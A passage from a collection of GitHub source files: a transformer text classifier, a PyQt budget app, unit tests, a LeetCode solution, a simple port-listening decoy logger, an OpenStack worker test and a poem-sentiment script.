AutoModelForSequenceClassification, get_linear_schedule_with_warmup\nfrom transformers.modeling_outputs import SequenceClassifierOutput\nfrom torchmetrics import MetricCollection, Recall, Precision, Accuracy, ConfusionMatrix\n\nfrom job_offers_classifier.classification_utils import *\n\nclass FullyConnectedOutput(nn.Module):\n def __init__(self, input_size, output_size, layer_units=(10,), nonlin=nn.ReLU(), hidden_dropout=0, output_nonlin=nn.Softmax(dim=1), criterion=nn.CrossEntropyLoss()):\n super().__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.nonlin = nonlin\n self.layer_units = layer_units\n self.output_nonlin = output_nonlin\n self.criterion = criterion\n self.hidden_dropout = hidden_dropout\n\n sequence = []\n units = [self.input_size] + list(self.layer_units) + [self.output_size]\n for in_size, out_size in zip(units, units[1:]):\n sequence.extend([nn.Linear(in_size, out_size), self.nonlin, nn.Dropout(self.hidden_dropout)])\n\n sequence = sequence[:-2]\n self.sequential = nn.Sequential(*sequence)\n\n def forward(self, batch, labels=None):\n output = self.sequential(batch)\n\n if labels is not None:\n return self.criterion(output, labels), output\n else:\n return self.output_nonlin(output)\n\n\nclass TransformerClassifier(LightningModule):\n def __init__(\n self,\n model_name_or_path: str,\n num_labels: int,\n output_type: str = \"linear\",\n learning_rate: float = 1e-5,\n adam_epsilon: float = 1e-8,\n warmup_steps: float = 50, # from 0-1 for % of training steps, >1 for number of steps\n weight_decay: float = 0.01,\n train_batch_size: int = 32,\n eval_batch_size: int = 32,\n hidden_dropout: float = 0.0,\n eval_top_k: int = 10,\n freeze_transformer: bool = False,\n verbose: bool = True,\n **kwargs,\n ):\n super().__init__()\n\n self.save_hyperparameters()\n\n if self.hparams.verbose:\n print(f\"Initializing TransformerClassifier with model_name={model_name_or_path}, output_type={output_type}, num_labels={num_labels}, learning_rate={learning_rate}, weight_decay={weight_decay}, warmup_steps={warmup_steps} ...\")\n\n self.config = AutoConfig.from_pretrained(\n model_name_or_path,\n finetuning_task=None\n )\n self.transformer = AutoModel.from_pretrained(model_name_or_path, config=self.config)\n self.output = self._get_output_layer(output_type, num_labels, hidden_dropout)\n\n metric_dict = {\n \"acc/r@1\": Accuracy(num_classes=num_labels),\n \"macro_acc\": Accuracy(num_classes=num_labels, average='macro'),\n #\"cf_matrix_true\": ConfusionMatrix(num_classes=num_labels, normalize='all'),\n #\"cf_matrix_all\": ConfusionMatrix(num_classes=num_labels, normalize='all')\n }\n\n for i in range(2, min(num_labels, eval_top_k + 1)):\n metric_dict[f\"r@{i}\"] = Recall(num_classes=num_labels, top_k=i)\n\n self.metrics = MetricCollection(metric_dict)\n\n\n def _get_output_layer(self, output_type, output_size, hidden_dropout):\n if output_type == \"linear\":\n return FullyConnectedOutput(self.config.hidden_size, output_size, layer_units=(), hidden_dropout=hidden_dropout, output_nonlin=nn.Softmax(dim=1), criterion=nn.CrossEntropyLoss())\n elif output_type == \"nn\":\n return FullyConnectedOutput(self.config.hidden_size, output_size, layer_units=(self.config.hidden_size,), hidden_dropout=hidden_dropout, output_nonlin=nn.Softmax(dim=1), criterion=nn.CrossEntropyLoss())\n else:\n raise ValueError(\"Unknown output_type for TransformersClassifier\")\n\n def forward(self, batch, labels=None):\n transformer_output = self.transformer(batch['input_ids'], attention_mask=batch['attention_mask'])\n transformer_output = transformer_output.last_hidden_state[:, 0, :]\n if self.output is None:\n return transformer_output\n else:\n return self.output.forward(transformer_output, labels=labels)\n\n def training_step(self, batch, batch_idx):\n if batch['labels'] is not None: # Windows fix\n batch['labels'] = batch['labels'].type(torch.LongTensor)\n batch['labels'] = batch['labels'].to(self.device)\n \n loss, scores = self.forward(batch, batch['labels'])\n self.log('train_loss', loss, on_epoch=True, logger=True)\n return loss\n\n def _eval_step(self, batch, eval_name='val'):\n if batch['labels'] is not None: # Windows fix\n batch['labels'] = batch['labels'].type(torch.LongTensor)\n batch['labels'] = batch['labels'].to(self.device)\n \n loss, scores = self.forward(batch, batch['labels'])\n self.log(f'{eval_name}_performance', self.metrics(scores, batch['labels']), on_epoch=True, logger=True)\n self.log(f'{eval_name}_loss', loss, on_epoch=True, logger=True)\n return loss\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n return self._eval_step(batch, eval_name='val')\n\n def validation_epoch_end(self, outputs):\n if self.hparams.verbose:\n print(\"Validation performance:\")\n pprint(self.metrics.compute())\n self.metrics.reset()\n\n def test_step(self, batch, batch_idx, dataloader_idx=0):\n return self._eval_step(batch, eval_name='test')\n\n def test_epoch_end(self, outputs):\n if self.hparams.verbose:\n print(\"Test performance:\")\n pprint(self.metrics.compute())\n\n def setup(self, stage=None) -> None:\n if stage != \"fit\":\n return\n\n # Get dataloader by calling it - train_dataloader() is called after setup() by default\n train_loader = self.trainer.datamodule.train_dataloader()\n\n # Calculate total steps\n tb_size = self.hparams.train_batch_size * max(1, self.trainer.gpus)\n ab_size = self.trainer.accumulate_grad_batches\n dl_size = len(train_loader.dataset) * self.trainer.max_epochs\n self.total_steps = dl_size // tb_size // ab_size\n\n self.num_warmup_steps = self.hparams.warmup_steps\n if self.hparams.warmup_steps < 1:\n self.num_warmup_steps = int(self.total_steps * self.hparams.warmup_steps)\n\n if self.hparams.verbose:\n print(\"Warmup_steps:\", self.num_warmup_steps)\n print(\"Total steps:\", self.total_steps)\n\n def configure_optimizers(self):\n # Prepare optimizer and schedule (linear warmup and decay)\n optimizer = AdamW(self._get_optimizer_grouped_parameters(),\n lr=self.hparams.learning_rate,\n eps=self.hparams.adam_epsilon)\n\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=self.num_warmup_steps,\n num_training_steps=self.total_steps,\n )\n scheduler = {\"scheduler\": scheduler, \"interval\": \"step\", \"frequency\": 1}\n return [optimizer], [scheduler]\n\n def save_transformer(self, ckpt_dir):\n self.transformer.save_pretrained(ckpt_dir)\n\n def _get_optimizer_grouped_parameters(self, layer_wise_lr=False, layer_wise_lr_mutli=1.1):\n # It is suggested to not use any decay for bias, LayerNorm.weight and LayerNorm.weight layers.\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n\n if layer_wise_lr:\n optimizer_grouped_parameters = []\n for name, params in self.named_parameters():\n weight_decay = 0.0 if any(nd in name for nd in no_decay) else self.hparams.weight_decay\n learning_rate = self.hparams.learning_rate\n\n if 'embeddings' in name or 'encoder' in name:\n learning_rate /= 10\n\n for i in range(0, 20):\n if f'layer.{i}' in name:\n learning_rate *= layer_wise_lr_mutli ** (i + 1)\n\n print(name, learning_rate)\n optimizer_grouped_parameters.append({\n \"params\": params,\n \"weight_decay\": weight_decay,\n \"lr\": learning_rate\n })\n\n else:\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in self.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": self.hparams.weight_decay,\n },\n {\n \"params\": [p for n, p in self.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n\n return optimizer_grouped_parameters\n","repo_name":"ONLABSPL/job-ads-classifier","sub_path":"job_offers_classifier/transformer_module.py","file_name":"transformer_module.py","file_ext":"py","file_size_in_byte":9049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39456396199","text":"#!/usr/bin/env python\n# encoding=utf-8\n# maintainer: rgaudin\n\nimport sys\n\nfrom PyQt4 import QtGui, QtCore\n\nfrom database import Account\nfrom data_helpers import period_has_budgets, \\\n current_period, create_empty_budgets\nfrom menubar import MenuBar\nfrom balanceview import BalanceViewWidget\nfrom operationview import OperationWidget\n\n\nclass MainWindow(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n\n self.resize(900, 650)\n self.setWindowTitle(_(u\"AN Budgets Manager\"))\n self.setWindowIcon(QtGui.QIcon('images/icon32.png'))\n\n self._account = None\n\n self.menubar = MenuBar(self)\n self.setMenuBar(self.menubar)\n\n if not period_has_budgets(current_period()):\n from balanceupdateview import BalanceUpdateWidget\n create_empty_budgets(current_period())\n self.change_context(BalanceUpdateWidget, force_current=True)\n else:\n self.change_context(BalanceViewWidget)\n\n def getaccount(self):\n return self._account\n\n def setaccount(self, value):\n if not isinstance(value, (Account, None.__class__)):\n raise ValueError(_(u\"account must be an Account or None.\"))\n self._account = value\n\n def clear_account(self):\n self.account = None\n\n account = property(getaccount, setaccount)\n\n def change_context(self, context_widget, *args, **kwargs):\n # remove account before switching\n self.clear_account()\n\n # instanciate context\n self.view_widget = context_widget(parent=self, *args, **kwargs)\n\n # refresh menubar\n self.menubar.refresh()\n\n # attach context to window\n self.setCentralWidget(self.view_widget)\n\n def open_dialog(self, dialog, modal=False, *args, **kwargs):\n d = dialog(parent=self, *args, **kwargs)\n d.setModal(modal)\n d.exec_()\n","repo_name":"yeleman/anm","sub_path":"anm/ui/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"20229301088","text":"import unittest\nimport numpy as np\nfrom Enterprise.service.feature_extraction import FeatureExtraction\nfrom Enterprise.service.key_words import KeyWords\n\n\nclass TestTopic(unittest.TestCase):\n def test_lda(self):\n file_list = ['新春 备 年货 , 新年 联欢晚会',\n '新春 节目单 , 春节 联欢晚会 红火',\n '大盘 下跌 股市 散户',\n '下跌 股市 赚钱',\n '金猴 新春 红火 新年',\n '新车 新年 年货 新春',\n '股市 反弹 下跌',\n '股市 散户 赚钱',\n '新年 , 看 春节 联欢晚会',\n '大盘 下跌 散户 散户']\n word, weight = FeatureExtraction.feature_extraction(file_list)\n print(\"特征项:\\n\", np.asarray(word))\n print(\"特征向量:\\n\", np.asarray(weight))\n doc_keywords = []\n KeyWords.cal_doc_keywords(weight, word, doc_keywords)\n print(\"文档关键词:\\n\", np.asarray(doc_keywords))\n\n self.assertEqual(doc_keywords,\n [['年货', '联欢晚会'], ['节目单', '红火'], ['大盘', '散户'], ['赚钱'], ['金猴', '红火'], ['新车', '年货'], ['反弹'],\n ['赚钱'], ['春节'], ['散户']])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"161250020/GraduationPro","sub_path":"Test/Enterprise/test_key_words.py","file_name":"test_key_words.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9911884143","text":"class Solution:\n def findComplement(self, num: int) -> int:\n s=bin(num).replace('0b','')\n t=''\n for i in s:\n if i=='0':\n t+='1'\n else:\n t+='0'\n return int(t,2)\n","repo_name":"Nosewall/Leetcode-Hobby-Dream-Machine","sub_path":"476. Number complement/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"15534847589","text":"\n# Menu tree\nmenu_tree = {1: \"ekstrudiranje\",\n 11: \"ZSK43\",\n 110: \"ekstrudiranje\",\n 111: \"čišćenje\",\n 112: \"čišćenje radnog mesta\",\n 113: \"čekanje probe sa mlina\",\n 114: \"kontrola\",\n 115: \"kvar\",\n 116: \"nema premiksa\",\n 1160: \"korekcija\",\n 1161: \"nema premiksa\",\n 1162: \"nema sirovine\",\n 117: \"nema konejnera za čips\",\n 118: \"zagrevanje\",\n 119: \"nema operatera\",\n 12: \"APV\",\n 120: \"ekstrudiranje\",\n 121: \"čišćenje\",\n 122: \"čišćenje radnog mesta\",\n 123: \"čekanje probe sa mlina\",\n 124: \"kontrola\",\n 125: \"kvar\",\n 126: \"nema premiksa\",\n 1260: \"korekcija\",\n 1261: \"nema premiksa\",\n 1262: \"nema sirovine\",\n 127: \"nema konejnera za čips\",\n 128: \"zagrevanje\",\n 129: \"nema operatera\",\n 2: \"mlevenje\",\n 21: \"ACM20\",\n 210: \"mlevenje\",\n 211: \"čišćenje\",\n 212: \"čišćenje radnog mesta\",\n 213: \"kontrola\",\n 214: \"kvar\",\n 215: \"nema čipsa\",\n 216: \"pražnjenje filtera\",\n 217: \"nema operatera\",\n 22: \"ACM30\",\n 220: \"mlevenje\",\n 221: \"čišćenje\",\n 222: \"čišćenje radnog mesta\",\n 223: \"kontrola\",\n 224: \"kvar\",\n 225: \"nema čipsa\",\n 226: \"pražnjenje filtera\",\n 227: \"nema operatera\",\n 3: \"šaržiranje\",\n 30: \"ubacivanje premiksa\",\n 31: \"mešanje premiksa\"\n }\n\n# breakdown_tree\nbreakdown_tree = {\"E1\": \"stanica za istakanje\",\n \"E11\": \"pneumatika\",\n \"E111\": \"creva\",\n \"E112\": \"spojnice\",\n \"E112\": \"elektroormar\",\n \"E12\": \"ručica za otvaranje kontejnera\",\n \"E121\": \"ručica na stanici za istakanje\",\n \"E122\": \"ručica na kontejneru\",\n \"E13\": \"tresač\",\n \"E131\": \"vibromotor\",\n \"E132\": \"elektroormar\",\n \"E14\": \"cev\",\n \"E141\": \"zaptivna guma\",\n \"E2\": \"dozirni koš\",\n \"E21\": \"motor\",\n \"E22\": \"spirala\",\n \"E23\": \"mehanizam\",\n \"E3\": \"pogonski mehanizam\",\n \"E31\": \"motor za šneke\",\n \"E32\": \"reduktor\",\n \"E33\": \"spojnica\",\n \"E34\": \"šneke\",\n \"E341\": \"zamena šnjura\",\n \"E342\": \"zakovale šneke\",\n \"E343\": \"stale šneke - viskoa T u el ormaru na APVu??\",\n \"E4\": \"temperaturne zone\",\n \"E41\": \"zagrevanje zona\",\n \"E411\": \"grejač\",\n \"E42\": \"hlađenje zona\",\n \"E421\": \"elektromagnetni ventil\",\n \"E422\": \"crevo za rashladnu vodu\",\n \"E423\": \"agregat sa destilovanom vodom\",\n \"E5\": \"rashladna traka\",\n\n \"E9\": \"Ostalo\",\n \"E91\": \"lift\",\n \"E92\": \"nestanak struje\",\n \"E93\": \"ventilacija\",\n \"E94\": \"komprimovani vazduh\",\n \"E95\": \"Mešač\",\n \"E96\": \"kontrolna tabla\",\n \"M1\": \"doziranje čipsa\",\n \"M2\": \"doziranje aditiva\",\n \"M3\": \"mlin\",\n \"M4\": \"ciklon\",\n \"M5\": \"filter\",\n \"M6\": \"separator\",\n \"M7\": \"istakanje\",\n \"M8\": \"ventilator\",\n \"M9\": \"ostalo\",\n \"M91\": \"rashladni uređaj za ulazni vazduh\",\n \"M92\": \"nestanak struje\",\n \"M93\": \"ventilacija\",\n \"M94\": \"dizalica\",\n \"M95\": \"senzor\"\n\n}\n","repo_name":"miiihaaas/OEE","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"497973550","text":"import subprocess\nimport random\nimport os\nimport asyncio\nimport json\nfrom datetime import datetime\nimport logging\n\n\nclass PortManager:\n def __init__(self, ports, stealth_port_path):\n self.ports = ports\n self.stealth_port_path = stealth_port_path\n\n async def spawn_stealth_port(self, port):\n while True:\n logging.info(f'[stealth] => START on {port}/tcp')\n try:\n proc = await asyncio.create_subprocess_exec(self.stealth_port_path, str(port), **subprocess_args())\n stdout, stderr = await proc.communicate()\n line = stdout.decode('ascii').rstrip()\n logging.info(f'[stealth] => {line}')\n parsed_line = json.loads(line)\n if parsed_line[\"returntype\"] == 'con':\n log_line = f'{datetime.now()}\\t{parsed_line[\"ip\"]}\\t{parsed_line[\"port\"]}\\n'\n with open('C:\\\\chaff\\\\chaff.log', 'a+') as f:\n f.write(log_line)\n f.flush()\n\n except Exception as e:\n logging.error(f'[stealth] =!> except: {e}')\n\n await asyncio.sleep(60)\n\n async def spawn_normal_port(self, port):\n try:\n logging.info(f'[normal] => START on {port}/tcp')\n await asyncio.start_server(cb_send_msg, '0.0.0.0', port)\n\n except Exception as e:\n logging.error(f'[normal] =!> except: {e}')\n\n def start(self):\n random.shuffle(self.ports)\n\n loop = asyncio.ProactorEventLoop()\n asyncio.set_event_loop(loop)\n tasks = [\n asyncio.ensure_future(self.spawn_stealth_port(self.ports[0])),\n asyncio.ensure_future(self.spawn_normal_port(self.ports[1])),\n ]\n\n loop.run_until_complete(asyncio.gather(*tasks))\n loop.close()\n\n\nasync def cb_send_msg(_reader, writer):\n _sock_bind_addr, sock_port = writer.get_extra_info('sockname')\n sock_peer_addr, _sock_peer_port = writer.get_extra_info('peername')\n print(f'[normal] => {sock_peer_addr} | {sock_port}')\n\n try:\n log_line = f'{datetime.now()}\\t{sock_peer_addr}\\t{sock_port}\\n'\n with open('C:\\\\chaff\\\\chaff.log', 'a+') as f:\n f.write(log_line)\n f.flush()\n writer.write(b'nice, my dude')\n await writer.drain()\n writer.close()\n except ConnectionResetError:\n logging.info(f'[normal] => ECONNRESET')\n except OSError as e:\n logging.info(f'[normal] =!> OSError: {e}')\n except Exception as e:\n logging.error(f'ERROR: {e}')\n\n\ndef subprocess_args(include_stdout=True):\n # The following is true only on Windows.\n if hasattr(subprocess, 'STARTUPINFO'):\n\n si = subprocess.STARTUPINFO()\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n\n env = os.environ\n else:\n si = None\n env = None\n\n if include_stdout:\n ret = {'stdout': subprocess.PIPE}\n else:\n ret = {}\n\n ret.update({'stdin': subprocess.PIPE,\n 'stderr': subprocess.PIPE,\n 'startupinfo': si,\n 'env': env})\n return ret\n\n\ndef main():\n logging.basicConfig(filename='C:\\\\chaff\\\\operational.log', level=logging.INFO)\n logging.info(\"STARTUP\")\n ports = [21, 22, 23, 80, 443, 8000, 8080, 25, 110, 53, 3306, 5900, 69]\n pm = PortManager(\n ports,\n 'C:\\\\chaff\\\\port.exe')\n pm.start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"loftwing/chaff","sub_path":"chaff.py","file_name":"chaff.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"24831907275","text":"import pytest\n\nfrom bioreactor_client.process_state_machine import AbortProcess\nfrom bioreactor_client.safety_monitor import SafetyMonitor\n\n\ndef test_over_temperature(mock_reactor):\n\n safety_monitor = SafetyMonitor(max_pressure=200, max_temperature=100)\n\n # Sanity check that we don't raise when under max temperature\n mock_reactor.get_reactor_status()['temperature'] = 90\n safety_monitor.monitor_reactor_parameters(mock_reactor.get_reactor_status())\n\n # Check that we catch an over-temperature condition\n mock_reactor.get_reactor_status()['temperature'] = 110\n with pytest.raises(AbortProcess):\n safety_monitor.monitor_reactor_parameters(mock_reactor.get_reactor_status())\n","repo_name":"pbaughman/bioreactor_client","sub_path":"tests/test_safety_monitor.py","file_name":"test_safety_monitor.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3167279378","text":"import requests\nimport time\nimport json\n\nTASK_PATH = \"/Users/user/Desktop/DataSciencePython/\"\nJOB_COUNT = 10\n\ntasks = {\n}\n\nwith open(TASK_PATH+\"logistic_regression_updated.py\") as pythonApp, open(TASK_PATH+\"requirements.txt\") as requirements:\n file_dict = {\"program\": pythonApp, \"requirements\": requirements}\n\n for _ in range(0, JOB_COUNT):\n response = requests.post(\"http://192.168.101.66:5000/routine\", files=file_dict).json()\n print(\"Task id:\", response)\n tasks[response[\"id\"]] = \"\"\n\nprint(\"Tasks: \", tasks)\nperformance = {}\n\nwhile len(tasks.keys()) > 0:\n response = requests.get(\"http://192.168.101.66:5000/mongo/taskstatus\", params={\"id\": tasks.keys()}).json()\n print(response)\n for task in response:\n print(\"Checking task %s\" % task[\"id\"])\n if task[\"status\"] == \"FAILURE\":\n print(\"Task %s failed\" % task[\"id\"])\n del tasks[task[\"id\"]]\n elif task[\"status\"] == \"SUCCESS\":\n print(\"Task %s finished successfully\" % task[\"id\"])\n del tasks[task[\"id\"]]\n\n performanceResp = requests.get(\"http://192.168.101.66:5000/mongo/taskperformance\", params={\"id\": task[\"id\"]}).json()\n print(performanceResp)\n performance[task[\"id\"]] = performanceResp\n\n time.sleep(1)\n\nwith open(\"output.json\", \"w\") as outputFile:\n json.dump(performance, outputFile)\n","repo_name":"gcd-cloud-research/KAQoS","sub_path":"test-routines/joblauncher.py","file_name":"joblauncher.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26555745221","text":"import fixtures\nimport os\nimport signal\nimport time\nimport traceback\n\nfrom nova.openstack.common import log as logging\nfrom nova import service\nfrom nova.tests.integrated import integrated_helpers\n\nLOG = logging.getLogger(__name__)\n\n\nclass MultiprocessWSGITest(integrated_helpers._IntegratedTestBase):\n def _start_api_service(self):\n # Process will be started in _spawn()\n self.osapi = service.WSGIService(\"osapi_compute\")\n self.auth_url = 'http://%s:%s/v2' % (self.osapi.host, self.osapi.port)\n LOG.info('auth_url = %s' % self.auth_url)\n\n def _get_flags(self):\n self.workers = 2\n f = super(MultiprocessWSGITest, self)._get_flags()\n f['osapi_compute_workers'] = self.workers\n return f\n\n def _spawn(self):\n pid = os.fork()\n if pid == 0:\n # NOTE(johannes): We can't let the child processes exit back\n # into the unit test framework since then we'll have multiple\n # processes running the same tests (and possibly forking more\n # processes that end up in the same situation). So we need\n # to catch all exceptions and make sure nothing leaks out, in\n # particlar SystemExit, which is raised by sys.exit(). We use\n # os._exit() which doesn't have this problem.\n status = 0\n try:\n launcher = service.ProcessLauncher()\n launcher.launch_server(self.osapi, workers=self.osapi.workers)\n launcher.wait()\n except SystemExit as exc:\n status = exc.code\n except BaseException:\n # We need to be defensive here too\n try:\n traceback.print_exc()\n except BaseException:\n LOG.error(\"Couldn't print traceback\")\n status = 2\n\n # Really exit\n os._exit(status)\n\n self.pid = pid\n\n # Wait at most 10 seconds to spawn workers\n cond = lambda: self.workers == len(self._get_workers())\n timeout = 10\n self._wait(cond, timeout)\n\n workers = self._get_workers()\n self.assertEqual(len(workers), self.workers)\n return workers\n\n def _wait(self, cond, timeout):\n start = time.time()\n while True:\n if cond():\n break\n if time.time() - start > timeout:\n break\n time.sleep(.1)\n\n def tearDown(self):\n if self.pid:\n # Make sure all processes are stopped\n os.kill(self.pid, signal.SIGTERM)\n\n try:\n # Make sure we reap our test process\n self._reap_test()\n except fixtures.TimeoutException:\n # If the child gets stuck or is too slow in existing\n # after receiving the SIGTERM, gracefully handle the\n # timeout exception and try harder to kill it. We need\n # to do this otherwise the child process can hold up\n # the test run\n os.kill(self.pid, signal.SIGKILL)\n\n super(MultiprocessWSGITest, self).tearDown()\n\n def _reap_test(self):\n pid, status = os.waitpid(self.pid, 0)\n self.pid = None\n return status\n\n def _get_workers(self):\n f = os.popen('ps ax -o pid,ppid,command')\n # Skip ps header\n f.readline()\n\n processes = [tuple(int(p) for p in l.strip().split()[:2])\n for l in f.readlines()]\n return [p for p, pp in processes if pp == self.pid]\n\n def test_killed_worker_recover(self):\n start_workers = self._spawn()\n\n # kill one worker and check if new worker can come up\n LOG.info('pid of first child is %s' % start_workers[0])\n os.kill(start_workers[0], signal.SIGTERM)\n\n # Wait at most 5 seconds to respawn a worker\n cond = lambda: start_workers != self._get_workers()\n timeout = 5\n self._wait(cond, timeout)\n\n # Make sure worker pids don't match\n end_workers = self._get_workers()\n LOG.info('workers: %r' % end_workers)\n self.assertNotEqual(start_workers, end_workers)\n\n # check if api service still works\n flavors = self.api.get_flavors()\n self.assertTrue(len(flavors) > 0, 'Num of flavors > 0.')\n\n def _terminate_with_signal(self, sig):\n self._spawn()\n\n # check if api service is working\n flavors = self.api.get_flavors()\n self.assertTrue(len(flavors) > 0, 'Num of flavors > 0.')\n\n os.kill(self.pid, sig)\n\n # Wait at most 5 seconds to kill all workers\n cond = lambda: not self._get_workers()\n timeout = 5\n self._wait(cond, timeout)\n\n workers = self._get_workers()\n LOG.info('workers: %r' % workers)\n self.assertFalse(workers, 'OS processes left %r' % workers)\n\n def test_terminate_sigkill(self):\n self._terminate_with_signal(signal.SIGKILL)\n status = self._reap_test()\n self.assertTrue(os.WIFSIGNALED(status))\n self.assertEqual(os.WTERMSIG(status), signal.SIGKILL)\n\n def test_terminate_sigterm(self):\n self._terminate_with_signal(signal.SIGTERM)\n status = self._reap_test()\n self.assertTrue(os.WIFEXITED(status))\n self.assertEqual(os.WEXITSTATUS(status), 0)\n","repo_name":"JiYou/openstack","sub_path":"packages/source/nova/nova/tests/integrated/test_multiprocess_api.py","file_name":"test_multiprocess_api.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"34"} +{"seq_id":"71895350817","text":"import json\n\n\nclass Book:\n\n def __init__(self):\n pass\n\n def appendbook(self, author, title, country, image_link, link, number_of_pages, language, year):\n with open('books.json', 'r') as json_file:\n data = json.load(json_file)\n dictionary = {\n \"author\": author,\n \"available\": True,\n \"country\": country,\n \"imageLink\": image_link,\n \"language\": language,\n \"link\": link + \"\\n\",\n \"pages\": number_of_pages,\n \"title\": title,\n \"year\": year\n }\n new_data = data\n new_data.append(dictionary)\n json_file.close()\n outfile = open('books.json', \"w\")\n outfile.write(\"\")\n outfile.write(json.dumps(new_data, indent=4, sort_keys=True))\n outfile.close()\n \n def searchbook(self, book):\n with open('books.json', 'r') as json_file:\n data = json.load(json_file)\n s1 = ''\n Userinput = book\n for d in data:\n data_string = str(d)\n lowercased_object = data_string.lower()\n lowercased_input = Userinput.lower()\n splitted_input = lowercased_input.split()\n for values in splitted_input:\n if values in lowercased_object:\n s = d[\"author\"] + \", \" + str(d[\"available\"]) + \", \" + d[\"country\"] + \", \" + d[\"imageLink\"] + \", \" + d[\"language\"] + \", \" + d[\"link\"] + \", \" + str(d[\"pages\"]) + \", \" + d[\"title\"] + \" and \" + str(d[\"year\"]) + \"\\n\" + \"----------------------------------------------------------------------------\" + \"\\n\"\n if s in s1:\n pass\n else:\n s1 = s1 + s\n print(s1)\n","repo_name":"Bramgus12/Analyse3","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3452190732","text":"from moviepy.editor import *\nfrom moviepy.video.tools.subtitles import SubtitlesClip\n\ngenerator = lambda txt: TextClip(txt, font='Arial', fontsize=24, color='black')\n\nf = open('enresult.txt', 'r', encoding='utf-8')\nLines = f.readlines()\n\nsubs = []\ncount = 0\nfor line in Lines:\n subs.append(((count, count + 10), line))\n count+=10\n\nsubtitles = SubtitlesClip(subs, generator)\n\nvideo = VideoFileClip(\"demo.mp4\")\nresult = CompositeVideoClip([video, subtitles.set_pos(('center','bottom'))])\n\nresult.write_videofile(\"output.mp4\")\n","repo_name":"pmkd42/Subtitle_Generator-Regional_Languages","sub_path":"jaatre!!/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15807169654","text":"import uuid\n\nfrom common.utils import time_stamp_hex_generator\nfrom rest_framework import serializers\n\nfrom schools import models\n\n\nclass SchoolSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.School\n fields = [\"id\", \"name\", \"max_student\"]\n\n\nclass StudentSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Student\n fields = [\"id\", \"student_id\", \"firstname\", \"lastname\", \"school\"]\n read_only_fields = [\"student_id\"]\n\n def school_is_full(self, target_school):\n students = models.Student.objects.filter(school=target_school).count()\n if students >= target_school.max_student:\n return True\n return False\n\n def create(self, validated_data):\n if self.school_is_full(validated_data[\"school\"]):\n raise serializers.ValidationError(\n {\"school\": [\"The school is already full\"]}\n )\n\n student = models.Student(\n firstname=validated_data[\"firstname\"],\n lastname=validated_data[\"lastname\"],\n school=validated_data[\"school\"],\n )\n student.student_id = time_stamp_hex_generator()\n student.save()\n return student\n","repo_name":"n-permana/api_school_and_student","sub_path":"app/schools/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71491807778","text":"# Create a set of vocabularies\n# Qian Yang (yang-qian@github, yangqian@cmu.edu)\n## OUTPUT: poems.json\n## Schema: text, topic, sentimen (pos,neg,compo)\n\n\n#import os.path, time\n#print(\"===\\nCreated by: Qian Yang\")\n#print(\"last modified: %s\" % time.ctime(os.path.getmtime(os.path.abspath(__file__))),'\\n===')\n\nfrom semantics import *\nimport csv,json\nimport pandas as pd\n\n\n# ======== POEMS from poetryfuncation.org ======== #\n\npoems_dict = {}\n\nwith open('poems-from-poetryfoundation-org.csv', 'r', encoding = 'utf-8') as fin:\n reader = csv.reader(fin)\n # print(next(reader)) # ignore old header\n\n for row in reader:\n author, content, name, age, _type = row\n \n # break down content into sentences\n for line in content.split('.'):\n line += '.'\n pos, neg, neu, compound = poem_sentiment(line)\n poems_dict[line.lstrip()] = {'poem name': name ,\n 'type': _type,\n 'pos': pos,\n 'neg': neg,\n 'neu': neu,\n 'compound': compound}\n\nprint(poems_dict)\n# write into json file\nwith open('poems.json', 'w') as fp:\n json.dump(poems_dict, fp)\n\nastro = pd.read_csv(\"poetastrologers_cleaned_tweets.csv\",\n header = None,\n names = ['content'])\n\n#poem_sentiment(poems)\n","repo_name":"yang-qian/Alternative-Alexa","sub_path":"vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15507299303","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 5 11:10:48 2016\n\n@author: RJovelin\n\"\"\"\n\n# use this function to filter out positions that are variable in 